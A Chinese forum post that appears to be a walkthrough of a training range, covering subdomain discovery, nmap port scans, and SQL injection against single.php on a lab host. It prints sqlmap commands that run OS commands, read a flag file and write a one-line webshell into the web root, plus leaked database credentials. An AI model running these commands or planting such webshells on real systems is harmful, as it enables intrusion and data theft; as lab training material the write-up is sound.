旧靶场-kali系列

nineone   ·   发表于 2021-04-16 19:01:59   ·   闲聊灌水区

子域名收集

  1. 直接https://site.ip138.com/ 找出所有的子域名,然后一个一个试端口
  2. 用题目给的字典,但是扫出来的子域名不齐全,也只有三个,但是我们扫出子域名的同时,得到了两个ip,然后再利用这两个ip去找同ip网站,一样可以找子域名
  3. 用fofa收集,但是出来的子域名也只有三个,但是得出了ip地址,利用ip去找同ip网站,一样可以得到子域名

端口扫描

第一关得出的链接,它对应的端口就是flag

这里有点小彩蛋,我们可以通过子域名收集得到的ip地址,来进行端口扫描,从而拿到隐藏靶场

nmap命令

  • nmap 1.1.1.1 -v
  • namp 1.1.1.1 -p 8000-8300 -v

web扫描器

flag在robots.txt文件里

sqlmap

在single.php里测试到id存在注入,并且输入单引号时,发现了绝对路径

直接

  1. sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --is-dba --batch

起飞,发现它是dba权限,我们可以干anythings,并且通过路径判定windows系统

  1. sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-cmd=whoami

这里执行cmd命令,可以执行成功

  1. sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-cmd=dir

列出文件先瞄一眼,太激动了.hhh,发现了一个flag.php文件

  1. sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-cmd="type flag.php"

一不小心得到了最后一关的flag

  1. sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --file-write="hacker.php" --file-dest="C:/phpStudy/WWW/hacker.php"

传个一句话木马上去,用蚁剑看看

  1. 发现在single.php内,爆出了mysql数据库信息,参数一是服务器位置,参数二用户名,参数三密码,参数四连接的数据库
#$conn = mysqli_connect("127.0.0.1","root","root","cake");
$conn = mysqli_connect("127.0.0.1","cake","Cake0001","cake");
  1. 用菜刀连数据库(蚁剑不知道咋连),在配置的时候输入账号密码,点击编辑就可保存

然后右键数据库管理。注意:进去之后直接点击不会出现数据,要自己输入语句才会出数据

sqlmap —os-shell

一不小心上一关拿到了flag

打赏我,让我更有动力~

0 Reply   |  Until 2021-4-16 | 1050 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.